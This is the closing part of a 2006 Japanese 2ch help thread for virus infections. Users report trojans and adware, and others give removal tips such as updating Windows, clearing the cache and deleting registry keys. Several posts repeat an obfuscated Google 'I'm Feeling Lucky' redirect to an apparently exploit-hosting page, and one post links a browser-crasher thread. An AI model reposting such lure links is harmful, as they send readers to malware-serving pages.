【AntiVirusは何を使っているか】 Norton2006
【ちゃんとUpdateしてるか】 しました。
【スキャンした結果(ウイルス名・発見場所)】 Trojan.Desktophijack
【別のオンラインスキャンしたならその結果は】 Trojan.Desktophijack
【症状を具体的に、分かる限りすべて書く】 http://up.kabubu.net/cgi/img2/5726.jpg
【何をしたらそんなことになったのか】tp://www.google.co.jp/search?hl=ja&q=%77%77%77%2E%64%6F%75%62%6C%65%68%2E%66%72%2F%61%75%64%69%6F%2F%69%6E%64%65%78%2E%68%74%6D&btnI=I%27mFeelingLucky&Ir=
上記のURLを踏んでしまった為。
【これまでにとった措置】 Nortonでの全スキャン、削除、Ad-awareでのスキャン、駆除しましたが、症状が回復しません。
【その他の質問】上記の他に Spyware.ISearch というアドウェアも検出されましたが、オンラインウイルス辞典に
書いてあるような症状が出ていません。

925 :名無しさん@お腹いっぱい。:2006/04/29(土) 11:57:41
おい ウィルス対策スレで
>【症状を具体的に、分かる限りすべて書く】 http://up.kabubu.net/cgi/img2/5726.jpg
って書いて見に行く奴いると思うか?

926 :名無しさん@お腹いっぱい。:2006/04/29(土) 12:08:24
>>925
すいません・・・
どう説明して良いかわからなくて・・
【症状を具体的に、分かる限りすべて書く】デスクトップの背景がおかしくなってしまった。

927 :名無しさん@お腹いっぱい。:2006/04/29(土) 12:15:39
>おかしくなって

どんなふうに?

928 :名無しさん@お腹いっぱい。:2006/04/29(土) 12:20:02
>>927
デスクトップの壁紙が>>924のtp://up.kabubu.net/cgi/img2/5726.jpgのようになってしまって
消えません。

929 :名無しさん@お腹いっぱい。:2006/04/29(土) 12:22:35
RazeSpywareって書いてるのにウイルススレか・・・
>>924
踏んだURLが原因ではない気がするんだけどなぁ・・・
そこにあるのはWindowsのバグを突くウイルスだからアップデートしてれば無害だし・・・

930 :名無しさん@お腹いっぱい。:2006/04/29(土) 12:22:51
どうしても誘導したいわけか・・・

  スルーだな

931 :名無しさん@お腹いっぱい。:2006/04/29(土) 12:25:29
>>929
そうなんですか・・・
すいません、スレ違いのようでした。
本当にゴメンナサイ。

932 :名無しさん@お腹いっぱい。:2006/04/29(土) 12:32:52
>>929
スレ違いとは言ったけど調べてみるとEwidoで駆除化だそうで

933 :名無しさん@お腹いっぱい。:2006/04/29(土) 12:35:52
>>929-930
今グーグルで検索をして、自力で解決しました。
本当にスレを汚してしまって申し訳ありませんでした。

934 :名無しさん@お腹いっぱい。:2006/04/29(土) 12:38:49
こういうのに感染したこと無いから知らないけど「システムの復元」だけじゃだめなのかな?
せっかくだから試して欲しいなー

935 :名無しさん@お腹いっぱい。:2006/04/29(土) 12:41:13
>>934
システムの復元はためしたんですが復元ができないと言われました。
本当にごめんなさい。

936 :名無しさん@お腹いっぱい。:2006/04/29(土) 12:46:36
報告どうも。そんな簡単なわけないですよねー
てか他スレに誤爆してたけどそっちの方が適切なスレっぽかったw

937 :名無しさん@お腹いっぱい。:2006/04/30(日) 13:10:52
使用OS】 XP home
【WindowsUpdateしてるか】 してます。
【AntiVirusは何を使っているか】 avast
【ちゃんとUpdateしてるか】 してます。
コントロールパネルを見ていたら知らぬ間にT2 searchbar assistantとフ・ツヒムヒ・というソフトがインストールされており
アンインストールしようとしても消せません。
検索してみた所、トレンドマイクロのサイトでのみ引っかかりましたが文字化けしていて中身が読めません。
一応avastとAd-Awareでスキャンをかけましたがどちらも引っかかりませんでした。
特に目立った症状はないのですが気になります。
アンインストするにはトレンドマイクロのアンチウィルスソフトを入れるしか方法はないのでしょうか?

938 :名無しさん@お腹いっぱい。:2006/04/30(日) 13:12:41
XPでパソコンを起動させる度に、ウイルスバスターが「TROJ DELF.BU」というウイルスを見つけます。
その度にバスター使って削除してるんですが、PC起動させるとまた見つかる。
ファイルごと削除してるのに・・・
ネットで調べたらトロイの木馬っぽいんですが、完全な対処方法はわからず・・・
おたすけ!

939 :名無しさん@お腹いっぱい。:2006/04/30(日) 14:04:21
>>937
オンラインスキャンで特定して
セーフモードから手動で削除
>>938
「れじすとり」

940 :名無しさん@お腹いっぱい。:2006/04/30(日) 17:37:04
お願いします。
【使用OS】 WindowsXP Pro SP2
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 使ってません
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】 JAVA_BYTEVER.AB 、JAVA_BYTEVER.A 、TROJ_NASCENE.Y
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
ttp://www.google.co.jp/search?hl=ja&q=www.doubleh.fr/audio/index.htm&btnI=I%27mFeelingLucky&Ir=
を踏んでしまいました。
【これまでにとった措置】
【その他の質問】
ttp://www.google.co.jp/search?hl=ja&q=www.doubleh.fr/audio/index.htm&btnI=I%27mFeelingLucky&Ir=
これを踏んでしまい、ウイルスバスターオンラインスキャンで調べたところ
JAVA_BYTEVER.AB
JAVA_BYTEVER.A
TROJ_NASCENE.Y
が発見されました。
駆除するにはどうしたら良いのでしょうか?

941 :名無しさん@お腹いっぱい。:2006/04/30(日) 17:41:17
>>940
ウイルスバスターオンラインスキャンで調べたところ
・・・を手動で削除

942 :名無しさん@お腹いっぱい。:2006/04/30(日) 17:51:23
>>941
レスありがとうございます。
手動で削除できるんですか!
申し訳ないのですが、もう少し詳しく教えて貰えないでしょうか。
お願いします。

943 :名無しさん@お腹いっぱい。:2006/04/30(日) 18:27:17
人に聞かなきゃ出来ないなら
【AntiVirusは何を使っているか】 使ってません
は無いだろう・・・

944 :名無しさん@お腹いっぱい。:2006/04/30(日) 18:29:04
>>942
まずはアンチウイルス買え

945 :名無しさん@お腹いっぱい。:2006/04/30(日) 18:34:39
>>943,>>944
PC買ったばかりで、アンチウイルスソフト購入してなかったんです・・。
トレンドマイクロ社のウイルスバスター2006で駆除できるのでしょうか?

946 :名無しさん@お腹いっぱい。:2006/04/30(日) 18:38:37
>>945
お試し版みたいのが入ってるだろ。
それを使え。

947 :名無しさん@お腹いっぱい。:2006/04/30(日) 18:56:03
>>946
オンラインスキャンした際、「駆除可能」欄に「いいえ」となっていたので
駆除できないのかと思っていました。
これからお試し版使ってみます。

948 :名無しさん@お腹いっぱい。:2006/04/30(日) 19:43:03
つかこれ、Windowsをアップデートしてれば問題無いはずだが・・・?
ホントにしてる?

949 :名無しさん@お腹いっぱい。:2006/04/30(日) 19:43:56
駆除可能かどうかってのは、ほかのファイルにとりつくタイプの狭義のウイルスの話だ
そんなものは今じゃ化石でそう見かけるもんじゃない

そうでないタイプはファイル自体が100%悪性だから駆除でなくて削除するんだ

あーそれからまずはIEのキャッシュクリアしてみ?
どれもセキュリティホール狙いのだからきっちりWindowsUpdateしてあれば発動してないぞ
その場合はキャッシュクリアして何も出なければそれで終了だ
ただしアンチウイルスソフトはきっちり入れろ

950 :名無しさん@お腹いっぱい。:2006/04/30(日) 19:51:41
花金雑談
http://etc4.2ch.net/test/read.cgi/male/1146383630/417

これ踏んじゃったんですが
どうしたらいいですか?



951 :名無しさん@お腹いっぱい。:2006/04/30(日) 19:56:23
【使用OS】 XP
【WindowsUpdateしてるか】 してる
【AntiVirusは何を使っているか】 わからない
【ちゃんとUpdateしてるか】 してる
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 目に見える症状はでてないです
【何をしたらそんなことになったのか】
ttp://www.google.co.jp/search?hl=ja&q=www.doubleh.fr/audio/index.htm&btnI=I%27mFeelingLucky&Ir=
【これまでにとった措置】 ノートンでスキャン
【その他の質問】
 特にないです

952 :名無しさん@お腹いっぱい。:2006/04/30(日) 19:58:42
>>951
何がしたいw

953 :名無しさん@お腹いっぱい。:2006/04/30(日) 19:59:33
>>951
少し上のレス1つ見れないのね

954 :名無しさん@お腹いっぱい。:2006/04/30(日) 19:59:54
>>952
いや普通に大丈夫なのか心配で書いたんだけど

955 :名無しさん@お腹いっぱい。:2006/04/30(日) 20:01:48
>>950
テンプレくらい書け、アホ
Telnetストームっていうブラクラだから一回限り、telnet.exeを停止させれば終わり
判らないならPC再起動でおk

956 :名無しさん@お腹いっぱい。:2006/04/30(日) 20:02:15
>>953
スマソ焦ってたんだ

957 :名無しさん@お腹いっぱい。:2006/04/30(日) 20:03:01
ar

958 :名無しさん@お腹いっぱい。:2006/04/30(日) 20:03:18
>>955
ごめん、ありがとうございました

959 :名無しさん@お腹いっぱい。:2006/04/30(日) 20:03:58
あれTelnetストームだったのか・・
リロードされるだけで何も起こらなかったぞ?

960 :951:2006/04/30(日) 20:04:00
アップデートしてれば大丈夫みたいだな
スマソ。これからは良く見るよ

961 :名無しさん@お腹いっぱい。:2006/05/01(月) 00:52:20
【使用OS】WindowsXP
【WindowsUpdateしてるか】してます
【AntiVirusは何を使っているか】ウイルスバスター2006
【ちゃんとUpdateしてるか】最新パターンファイルです。
【スキャンした結果(ウイルス名・発見場所)】TROJ_DLOADER.DAW
windowsのsystem32ディレクトリの中です。winubg32.dll
【別のオンラインスキャンしたならその結果は】
シマンテックのオンラインスキャンでは発見できませんでした。
【症状を具体的に、分かる限りすべて書く】
トロイの木馬とのことですが、現状被害は不明です。
亜種ではパスワードを盗むようですが。
【何をしたらそんなことになったのか】わかりません。
【これまでにとった措置】セーフモードでの削除⇒実行中で負荷
Runレジストリの削除⇒再起動で復活
【その他の質問】

削除をしたいです。
よろしくお願いします。


962 :名無しさん@お腹いっぱい。:2006/05/01(月) 02:02:45
>>961
TROJ_DLOADER.DAWはレジストリの改変はしないと書いてある。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FDLOADER%2EDAW&VSect=P

winubg32.dll でぐぐったら HijackThis でO20にエントリーが現れるみたいなので
別のマルウエアの可能性が考えられる。
(個別に見ていないのでほかの場所にエントリーが現れるかは不明)
HijackThis で削除するのが一番だけど手動削除なら
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
のサブキー winubg32.dll を削除後、Run関係と winubg32.dll を削除する。

もう寝るので追加質問はパス。

963 :名無しさん@お腹いっぱい。:2006/05/01(月) 02:03:04
>>961
つttp://uk.trendmicro-europe.com/smb/support/pattern.php

964 :名無しさん@お腹いっぱい。:2006/05/01(月) 03:02:30
http://japan.internet.com/webtech/20060316/print11.html
ここの記事に書いてあるウイルスにかかりました・・
どうすればいいのでしょうか?大事なファイルが・・

965 :名無しさん@お腹いっぱい。:2006/05/01(月) 03:07:11
>>964
志村ーテンプレ!テンプレ!

966 :名無しさん@お腹いっぱい。:2006/05/01(月) 03:11:54
>>964
バックアップがあれば痛くも痒くもない

967 :名無しさん@お腹いっぱい。:2006/05/01(月) 03:13:19
OS再インスト

968 :964:2006/05/01(月) 03:20:12
色んな暗証番号とかメモ張に書いといたファイルが
変なファイルにかえられちまって、、、もう二度とわかんねぇ
ファイル復元とかってできるんですか?
ひぃぃ

969 :名無しさん@お腹いっぱい。:2006/05/01(月) 03:21:07
あきらめが肝心

970 :名無しさん@お腹いっぱい。:2006/05/01(月) 03:24:00
どうやったらこんなマイナーなウイルスに感染するんだ?

971 :964:2006/05/01(月) 03:30:55
>>970
今日ディープインパクトが勝ったのをみてちょっと競馬版を
のぞいてみましてそこにたまたま上にあった「レイプ騎手」
というスレの1に貼ってあったURLを無意識に踏んでしまい死にました。
オワタ

972 :名無しさん@お腹いっぱい。:2006/05/01(月) 04:42:42
てかスレを探してみてきたけど>>940>>951同じURLだし

973 :940:2006/05/01(月) 08:01:29
皆様、お騒がせ致しました。
体験版のウイルスバスター2006で削除できたみたいです。

>>948
Updateはしていました。

>>949
駆除と削除で意味違うんですね。
一緒くたにしてました。
やはりUpdateはしていましたが、ウイルスバスターオンラインスキャンで
調べたところ、上記ウィルスが発見されました。

>その場合はキャッシュクリアして何も出なければそれで終了だ
Updateはしていたので、感染はしているけど発動はしていない、
という状態だったのでしょうか?

974 :961:2006/05/01(月) 12:22:51
>>962-963
レスありがとうございます。
会社からなので削除ができないのですが、
手動削除において、プログラムの実行中のためできないといわれた場合
どのように対処したらよいのでしょうか?
タスクマネージャでそれらしきものを強制終了させてみたものの、
winubg32.dllは実行中のままでした。

975 :名無しさん@お腹いっぱい。:2006/05/01(月) 18:15:37
>>974
.dllはrundll32.exe経由での起動か、IEのプラグインだ
全部落とせ

976 :名無しさん@お腹いっぱい。:2006/05/01(月) 22:33:16
コピペウィルスを貼ったらタイーホされる可能性はありますか?

977 :名無しさん@お腹いっぱい。:2006/05/01(月) 22:55:35
ある

978 :名無しさん@お腹いっぱい。:2006/05/01(月) 23:36:57
拡張子がwmv、aviといったファイルが、実行するとexeにかわるなんてウイルスありますか?
(wmv .exe)みたいな単なる偽装ファイルではなくて

979 :名無しさん@お腹いっぱい。:2006/05/01(月) 23:49:41
>>978
ある

980 :名無しさん@お腹いっぱい。:2006/05/01(月) 23:52:56
>>978
コデのDLを利用するものがある
しか知らない
>>979
kwsk

981 :名無しさん@お腹いっぱい。:2006/05/02(火) 03:12:01
質問です。突然、パソコンがフリーズするようになりました。
spybot や AVG や トレンドマイクロオンラインウイルススキャン を
実行してウイルスチェックすると、いつも同じくらい検索した場所でPCがフリーズします。

ウイルスチェック中に必ずフリーズするので
ウイルスの有無も確認できずに困っています。

フリーズ直前に検索で coolWWWSerch  
っていうスパイウェアが見つかったくらいしか手がかりはありません。
あと、タスクマネージャのプロセスを書き出しました。↓で書きます。
何か対策があれば是非よろしくお願いします。

【OS】 Windows XP pro
【症状】 作業中にまれにPCがフリーズする。
      ネットサーフィン中に海外のエロサイトに飛ばされる。
      ウイルスチェック等をしたら確実にフリーズする。
      

982 :981:2006/05/02(火) 03:12:58
タスクマネージャのプロセス

notepad.exe user
wuauclt.exe SYSTEM
taskmgr.exe user
iPodService.exe SYSTEM
nvsnc32.exe SYSTEM
avgupsvc.exe SYSTEM
avgamsvr.exe SYSTEM
ctfmon.exe user
qttask.exe user
iTunesHelper.exe user
daemon.exe user
avgemc.exe user
explorer.exe user
svchost.exe SYSTEM
spoolsv.exe SYSTEM
svchost.exe LOCALSERVICE
svchost.exe NETWORK SERVICE
svchost.exe SYSTEM
svchost.exe NETWORK SERVICE
svchost.exe SYSTEM
lsass.exe SYSTEM
services.exe SYSTEM
alg.exe LOCAL SERVICE
winlogon.exe SYSTEM
csrss.exe SYSTEM
smss.exe SYSTEM
System SYSTEM
System Idle Process SYSTEM



983 :名無しさん@お腹いっぱい。:2006/05/02(火) 03:17:42
>>981
http://pc8.2ch.net/test/read.cgi/sec/1105163498/
【スパイウェア】CoolWebSearch 対策

984 :981:2006/05/02(火) 03:20:12
テンプレも書きます

【使用OS】 Windows XP pro
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 フリーのAVG&spybot
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 検索中に必ずフリーズ 「coolWWWsearch」のみ発見
【別のオンラインスキャンしたならその結果は】 AVG spybot トレンドオンラインスキャン 全部フリーズ
【症状を具体的に、分かる限りすべて書く】 ウイルス検索中に必ずフリーズする 時々急にフリーズもある
【何をしたらそんなことになったのか】 ネットサーフィンやらダウンロードくらいしか心当たりありません
【これまでにとった措置】 AVG spybot トレンドマイクロオンラインスキャン
【その他の質問】 対処法があれば是非よろしくお願いいたします


985 :981:2006/05/02(火) 03:26:05
>>983
ありがとうございます。
さっそく見てみます

986 :名無しさん@お腹いっぱい。:2006/05/02(火) 05:05:03
>>985
FWは?

987 :名無しさん@お腹いっぱい。:2006/05/02(火) 14:24:19
age

988 :たわし:2006/05/02(火) 19:06:28
私は今、困っています。ウィルスなのかわかりませんが、LimeWireで画像をとっていたら、
ゲットした画像が削除も移動も何もできない状態なのです。 ファイルの情報も見ることができず、
大変困っています。 これは何なのですか。どうかわかる方が、いましたら助言をお願いいたします。
ファイルはJPEGです。

989 :名無しさん@お腹いっぱい。:2006/05/02(火) 19:25:13
>>988
http://tmp6.2ch.net/test/read.cgi/download/1146419309/6


990 :名無しさん@お腹いっぱい。:2006/05/02(火) 20:52:23
ウイルス (WORM_MYDOOM.L) が (text.zip/text.scr) から検出されました

こんなメールがプロバイダから届くようになってしまったんですが、対策方法を教えていただけないでしょうか?

検索しても何をして良いやら。

991 :名無しさん@お腹いっぱい。:2006/05/02(火) 21:05:55
>>990
駆除

992 :名無しさん@お腹いっぱい。:2006/05/03(水) 01:08:01
>>990
プロバイダに相談

993 :名無しさん@お腹いっぱい。:2006/05/03(水) 01:43:36
うめ

994 :名無しさん@お腹いっぱい。:2006/05/03(水) 01:58:50


995 :名無しさん@お腹いっぱい。:2006/05/03(水) 02:01:43
     ∧__∧
    ( ・ω・)   うめどす
    ハ∨/^ヽ
   ノ::[三ノ :.'、
   i)、_;|*く;  ノ
     |!: ::.".T~
     ハ、___|
"""~""""""~"""~"""~"


996 :名無しさん@お腹いっぱい。:2006/05/03(水) 02:01:54
>>988
http://pc8.2ch.net/test/read.cgi/sec/1012738028/120

997 :名無しさん@お腹いっぱい。:2006/05/03(水) 02:02:41
ume

998 :名無しさん@お腹いっぱい。:2006/05/03(水) 02:03:07
         !ヽ、
       ,r'l |  \
      ,/ | l / ゙i,
     /..::;;| |ノ   ゙! ・・・「うめだ!」ゴルア
 _ _ __, /:::;:;;;i l    ∧ ∧ _ ___ ___ __ __ _ ___ _ __ __
  . .  /;;;;;;;;;;l |! ̄゛(,, ゚Д) .. .. . . .. .. . . .. . . .. . . ::
   ,/   |‖‐( / つo .、 : : : : : : :. : .: . : .. : .
  〈 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ゙̄^>   ''  ::.   '^
  〜"''::.'〜:''^''〜'''"''^〜'''"
 ^  、,  ^  ^   ^^   ^^ ^ 、,
       ~       〜       〜〜

999 :名無しさん@お腹いっぱい。:2006/05/03(水) 02:05:25
999

1000 :名無しさん@お腹いっぱい。:2006/05/03(水) 02:05:55
せんまさお

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

304 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)